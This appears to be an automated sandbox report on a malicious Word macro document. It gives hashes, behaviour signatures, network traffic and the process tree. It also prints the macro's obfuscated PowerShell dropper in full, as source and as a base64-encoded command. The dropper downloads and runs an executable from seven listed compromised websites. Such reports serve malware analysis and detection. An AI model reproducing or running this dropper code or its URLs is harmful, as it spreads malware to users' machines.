Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
27/09/2024, 03:57 UTC
General
-
Target
f9aa43fd07fd831aa3938317df777884_JaffaCakes118.doc
-
Size
143KB
-
MD5
f9aa43fd07fd831aa3938317df777884
-
SHA1
ca3c9f652bfb945bdf94f2b4de46cce5b3eb3ed3
-
SHA256
5f1ea173886baa8208a164cab30480d8362327401dc4782d01aa1caeb3314b9d
-
SHA512
fde6615e11e8ab41da18ee1fabdcd29ae4597c4355455c109ed220c0dae177af0b6ec620161c408b9c9b1328ebf8411b85543f81a2409abe484387ab8d44aed3
-
SSDEEP
1536:ALRD3bNqfNpu39IId5a6XP3Mg8afCqaIoF3Cgar3Pd0MZXiNjLooT:8R1qf69xak3MgxCCoMFr3Pd0MZXiNPvT
Score
10/10
Malware Config
Extracted
Language
ps1
Source
1
$Aq3qi8j=('N'+('e'+'xhh')+'m5');&('ne'+'w-ite'+'m') $EnV:UseRproFilE\Zqx41rP\OnFoGa8\ -itemtype DirEctory;[Net.ServicePointManager]::"SeCu`RItypR`O`ToCol" = ('tl'+('s'+'12, tls1')+'1,'+' t'+'ls');$J9g_adk = ('E0'+('jn'+'w')+'y3');$Jzg4_0_=('Bn'+('_vl6'+'h'));$M503fem=$env:userprofile+(('EY'+'B'+('Zqx'+'41r'+'p')+('EY'+'BOnfog'+'a8'+'EY')+'B')."R`ePLace"(('E'+'YB'),'\'))+$J9g_adk+('.'+('e'+'xe'));$Eqkv5ic=(('N3'+'j')+('h2t'+'g'));$Br9ijhy=&('new-ob'+'j'+'ect') nEt.WEbclIeNt;$I6kafnl=('ht'+'t'+('p'+'s:'+'//s'+'hop.mtcss.co'+'.')+'u'+('k/'+'w')+('p-ad'+'m'+'in/US'+'QF')+'Pj'+('/*'+'htt')+('ps:/'+'/h')+('andf'+'i')+('nger.'+'c')+'o'+'m'+('/wp-'+'i'+'ncl')+('u'+'des/iC'+'Y/*h'+'t')+('tp:'+'/'+'/hanu')+'l'+('mo'+'tor')+'s'+('.com'+'/'+'nbq'+'s')+('o/8'+'T')+('z'+'/*')+('htt'+'p:'+'//he')+('lpi'+'nghand'+'s4n'+'ee'+'d')+('y.o'+'rg')+('/w'+'p-con'+'t')+('e'+'nt')+('/Lgr'+'I9'+'g/')+('*htt'+'p://'+'w')+('ww.'+'eco'+'barato'+'canari'+'a.com')+'/'+'wo'+'rd'+('p'+'ress/')+('Jt/'+'*')+('h'+'tt')+('p:/'+'/ma'+'cerin')+'d'+'ia'+('.'+'com/w'+'p-con'+'tent')+'/'+'h'+'R'+('S/*'+'ht')+('tp'+'://cf'+'n.')+('tvs'+'tart'+'up.co')+('m/'+'wp')+('-cont'+'ent/7'+'dNH1L'+'I/'))."S`pliT"([char]42);$R2ct1qi=(('Ek'+'g5')+('mj'+'c'));foreach($Mqnj4jr in $I6kafnl){try{$Br9ijhy."DO`wnLo`ADfi`lE"($Mqnj4jr, $M503fem);$Thggohh=('Q'+('9kh'+'13')+'w');If ((.('G'+'et-Item') $M503fem)."leng`Th" -ge 30237) {&('Invok'+'e-'+'Item')($M503fem);$Q8v4yn2=(('Tptc'+'i')+'8j');break;$Yquma0r=('X7'+('4'+'ga6')+'o')}}catch{}}$Qyzmrtd=('L'+('0x'+'3yd'+'p'))
URLs
exe.dropper
https://shop.mtcss.co.uk/wp-admin/USQFPj/
exe.dropper
https://handfinger.com/wp-includes/iCY/
exe.dropper
http://hanulmotors.com/nbqso/8Tz/
exe.dropper
http://helpinghands4needy.org/wp-content/LgrI9g/
exe.dropper
http://www.ecobaratocanaria.com/wordpress/Jt/
exe.dropper
http://macerindia.com/wp-content/hRS/
exe.dropper
http://cfn.tvstartup.com/wp-content/7dNH1LI/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 8 IoCs
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f9aa43fd07fd831aa3938317df777884_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABBAHEAMwBxAGkAOABqAD0AKAAnAE4AJwArACgAJwBlACcAKwAnAHgAaABoACcAKQArACcAbQA1ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAVQBzAGUAUgBwAHIAbwBGAGkAbABFAFwAWgBxAHgANAAxAHIAUABcAE8AbgBGAG8ARwBhADgAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAHUAYABSAEkAdAB5AHAAUgBgAE8AYABUAG8AQwBvAGwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAnACsAJwAxADIALAAgAHQAbABzADEAJwApACsAJwAxACwAJwArACcAIAB0ACcAKwAnAGwAcwAnACkAOwAkAEoAOQBnAF8AYQBkAGsAIAA9ACAAKAAnAEUAMAAnACsAKAAnAGoAbgAnACsAJwB3ACcAKQArACcAeQAzACcAKQA7ACQASgB6AGcANABfADAAXwA9ACgAJwBCAG4AJwArACgAJwBfAHYAbAA2ACcAKwAnAGgAJwApACkAOwAkAE0ANQAwADMAZgBlAG0APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcARQBZACcAKwAnAEIAJwArACgAJwBaAHEAeAAnACsAJwA0ADEAcgAnACsAJwBwACcAKQArACgAJwBFAFkAJwArACcAQgBPAG4AZgBvAGcAJwArACcAYQA4ACcAKwAnAEUAWQAnACkAKwAnAEIAJwApAC4AIgBSAGAAZQBQAEwAYQBjAGUAIgAoACgAJwBFACcAKwAnAFkAQgAnACkALAAnAFwAJwApACkAKwAkAEoAOQBnAF8AYQBkAGsAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABFAHEAawB2ADUAaQBjAD0AKAAoACcATgAzACcAKwAnAGoAJwApACsAKAAnAGgAMgB0ACcAKwAnAGcAJwApACkAOwAkAEIAcgA5AGkAagBoAHkAPQAmACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBFAGIAYwBsAEkAZQBOAHQAOwAkAEkANgBrAGEAZgBuAGwAPQAoACcAaAB0ACcAKwAnAHQAJwArACgAJwBwACcAKwAnAHMAOgAnACsAJwAvAC8AcwAnACsAJwBoAG8AcAAuAG0AdABjAHMAcwAuAGMAbwAnACsAJwAuACcAKQArACcAdQAnACsAKAAnAGsALwAnACsAJwB3ACcAKQArACgAJwBwAC0AYQBkACcAKwAnAG0AJwArACcAaQBuAC8AVQBTACcAKwAnAFEARgAnACkAKwAnAFAAagAnACsAKAAnAC8AKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcABzADoALwAnACsAJwAvAGgAJwApACsAKAAnAGEAbgBkAGYAJwArACcAaQAnACkAKwAoACcAbgBnAGUAcgAuACcAKwAnAGMAJwApACsAJwBvACcAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGkAJwArACcAbgBjAGwAJwApACsAKAAnAHUAJwArACcAZABlAHMALwBpAEMAJwArACcAWQAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvACcAKwAnAC8AaABhAG4AdQAnACkAKwAnAGwAJwArACgAJwBtAG8AJwArACcAdABvAHIAJwApACsAJwBzACcAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKwAnAG4AYgBxACcAKwAnAHMAJwApACsAKAAnAG8ALwA4ACcAKwAnAFQAJwApACsAKAAnAHoAJwArACcALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwADoAJwArACcALwAvAGgAZQAnACkAKwAoACcAbABwAGkAJwArACcAbgBnAGgAYQBuAGQAJwArACcAcwA0AG4AJwArACcAZQBlACcAKwAnAGQAJwApACsAKAAnAHkALgBvACcAKwAnAHIAZwAnACkAKwAoACcALwB3ACcAKwAnAHAALQBjAG8AbgAnACsAJwB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAnACkAKwAoACcALwBMAGcAcgAnACsAJwBJADkAJwArACcAZwAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAdwAnACkAKwAoACcAdwB3AC4AJwArACcAZQBjAG8AJwArACcAYgBhAHIAYQB0AG8AJwArACcAYwBhAG4AYQByAGkAJwArACcAYQAuAGMAbwBtACcAKQArACcALwAnACsAJwB3AG8AJwArACcAcgBkACcAKwAoACcAcAAnACsAJwByAGUAcwBzAC8AJwApACsAKAAnAEoAdAAvACcAKwAnACoAJwApACsAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoALwAnACsAJwAvAG0AYQAnACsAJwBjAGUAcgBpAG4AJwApACsAJwBkACcAKwAnAGkAYQAnACsAKAAnAC4AJwArACcAYwBvAG0ALwB3ACcAKwAnAHAALQBjAG8AbgAnACsAJwB0AGUAbgB0ACcAKQArACcALwAnACsAJwBoACcAKwAnAFIAJwArACgAJwBTAC8AKgAnACsAJwBoAHQAJwApACsAKAAnAHQAcAAnACsAJwA6AC8ALwBjAGYAJwArACcAbgAuACcAKQArACgAJwB0AHYAcwAnACsAJwB0AGEAcgB0ACcAKwAnAHUAcAAuAGMAbwAnACkAKwAoACcAbQAvACcAKwAnAHcAcAAnACkAKwAoACcALQBjAG8AbgB0ACcAKwAnAGUAbgB0AC8ANwAnACsAJwBkAE4ASAAxAEwAJwArACcASQAvACcAKQApAC4AIgBTAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFIAMgBjAHQAMQBxAGkAPQAoACgAJwBFAGsAJwArACcAZwA1ACcAKQArACgAJwBtAGoAJwArACcAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AcQBuAGoANABqAHIAIABpAG4AIAAkAEkANgBrAGEAZgBuAGwAKQB7AHQAcgB5AHsAJABCAHIAOQBpAGoAaAB5AC4AIgBEAE8AYAB3AG4ATABvAGAAQQBEAGYAaQBgAGwARQAiACgAJABNAHEAbgBqADQAagByACwAIAAkAE0ANQAwADMAZgBlAG0AKQA7ACQAVABoAGcAZwBvAGgAaAA9ACgAJwBRACcAKwAoACcAOQBrAGgAJwArACcAMQAzACcAKQArACcAdwAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQATQA1ADAAMwBmAGUAbQApAC4AIgBsAGUAbgBnAGAAVABoACIAIAAtAGcAZQAgADMAMAAyADMANwApACAAewAmACgAJwBJAG4AdgBvAGsAJwArACcAZQAtACcAKwAnAEkAdABlAG0AJwApACgAJABNADUAMAAzAGYAZQBtACkAOwAkAFEAOAB2ADQAeQBuADIAPQAoACgAJwBUAHAAdABjACcAKwAnAGkAJwApACsAJwA4AGoAJwApADsAYgByAGUAYQBrADsAJABZAHEAdQBtAGEAMAByAD0AKAAnAFgANwAnACsAKAAnADQAJwArACcAZwBhADYAJwApACsAJwBvACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQB5AHoAbQByAHQAZAA9ACgAJwBMACcAKwAoACcAMAB4ACcAKwAnADMAeQBkACcAKwAnAHAAJwApACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
-
DNSshop.mtcss.co.ukRemote address:8.8.8.8:53Requestshop.mtcss.co.ukIN AResponseshop.mtcss.co.ukIN A165.84.218.143 -
DNShandfinger.comRemote address:8.8.8.8:53Requesthandfinger.comIN AResponsehandfinger.comIN A108.61.87.182
-
DNShanulmotors.comRemote address:8.8.8.8:53Requesthanulmotors.comIN AResponsehanulmotors.comIN A107.178.223.183hanulmotors.comIN A104.155.138.21
-
GEThttp://hanulmotors.com/nbqso/8Tz/Remote address:107.178.223.183:80RequestGET /nbqso/8Tz/ HTTP/1.1
Host: hanulmotors.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 0
-
DNShelpinghands4needy.orgRemote address:8.8.8.8:53Requesthelpinghands4needy.orgIN AResponsehelpinghands4needy.orgIN A62.72.28.183
-
GEThttp://helpinghands4needy.org/wp-content/LgrI9g/Remote address:62.72.28.183:80RequestGET /wp-content/LgrI9g/ HTTP/1.1
Host: helpinghands4needy.org
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
last-modified: Mon, 11 Sep 2023 19:30:30 GMT
etag: "999-64ff6ad6-58be6882cd98db7a;;;"
accept-ranges: bytes
content-length: 2457
date: Fri, 27 Sep 2024 03:57:36 GMT
server: LiteSpeed
platform: hostinger
panel: hpanel
-
DNSwww.ecobaratocanaria.comRemote address:8.8.8.8:53Requestwww.ecobaratocanaria.comIN AResponse
-
DNSmacerindia.comRemote address:8.8.8.8:53Requestmacerindia.comIN AResponsemacerindia.comIN A104.21.51.108macerindia.comIN A172.67.179.125
-
GEThttp://macerindia.com/wp-content/hRS/Remote address:104.21.51.108:80RequestGET /wp-content/hRS/ HTTP/1.1
Host: macerindia.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Fri, 27 Sep 2024 03:57:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-UA-Compatible: IE=edge
Link: <http://macerindia.com/wp-json/>; rel="https://api.w.org/"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rgsg1cuaBm4WkF%2BKZvBmMIfwV7jvr0I%2BC7%2BxOB0hB%2B8YkkgH9zQZPkgF9ldXvCsGZQ2Y7IBADarnyTF07vD2cwuib36LDSX6RggA%2BWO1kHVYHr9Vjv5PX%2BLpk%2BY0kwY3Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Speculation-Rules: "/cdn-cgi/speculation"
Server: cloudflare
CF-RAY: 8c98920e3c997765-LHR
-
DNScfn.tvstartup.comRemote address:8.8.8.8:53Requestcfn.tvstartup.comIN AResponsecfn.tvstartup.comIN A38.86.32.67
-
GEThttp://cfn.tvstartup.com/wp-content/7dNH1LI/Remote address:38.86.32.67:80RequestGET /wp-content/7dNH1LI/ HTTP/1.1
Host: cfn.tvstartup.com
Connection: Keep-Alive
ResponseHTTP/1.1 503 Service Unavailable
Date: Fri, 27 Sep 2024 03:57:36 GMT
Server: Apache
Retry-After: 600
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
-
165.84.218.143:443shop.mtcss.co.uktls -
165.84.218.143:443shop.mtcss.co.uktls
-
108.61.87.182:443handfinger.comtls
-
108.61.87.182:443handfinger.comtls
-
107.178.223.183:80http://hanulmotors.com/nbqso/8Tz/http
HTTP Request
GET http://hanulmotors.com/nbqso/8Tz/HTTP Response
200 -
62.72.28.183:80http://helpinghands4needy.org/wp-content/LgrI9g/http
HTTP Request
GET http://helpinghands4needy.org/wp-content/LgrI9g/HTTP Response
404 -
104.21.51.108:80http://macerindia.com/wp-content/hRS/http
HTTP Request
GET http://macerindia.com/wp-content/hRS/HTTP Response
404 -
38.86.32.67:80http://cfn.tvstartup.com/wp-content/7dNH1LI/http
HTTP Request
GET http://cfn.tvstartup.com/wp-content/7dNH1LI/HTTP Response
503
-
8.8.8.8:53shop.mtcss.co.ukdns
DNS Request
shop.mtcss.co.uk
DNS Response
165.84.218.143
-
8.8.8.8:53handfinger.comdns
DNS Request
handfinger.com
DNS Response
108.61.87.182
-
8.8.8.8:53hanulmotors.comdns
DNS Request
hanulmotors.com
DNS Response
107.178.223.183104.155.138.21
-
8.8.8.8:53helpinghands4needy.orgdns
DNS Request
helpinghands4needy.org
DNS Response
62.72.28.183
-
8.8.8.8:53www.ecobaratocanaria.comdns
DNS Request
www.ecobaratocanaria.com
-
8.8.8.8:53macerindia.comdns
DNS Request
macerindia.com
DNS Response
104.21.51.108172.67.179.125
-
8.8.8.8:53cfn.tvstartup.comdns
DNS Request
cfn.tvstartup.com
DNS Response
38.86.32.67
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5b9b3b2336082afbf88a52b33d8e0715c
SHA19af482baa7eae6764664794d12eafd04dc68ba1e
SHA2562ebbaa16a14690be371c40f98c3b0e93ce7dad747191e1bb4a5a04d64b764300
SHA512ac6e39a42e3490d692deaccc52f0d228a158f0227a3d3c5af3d46ee710f6268cfe662189994ab5fe102c5e3135d147ddf7a8f647532798f263b0730e61cd243b
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
2.9MB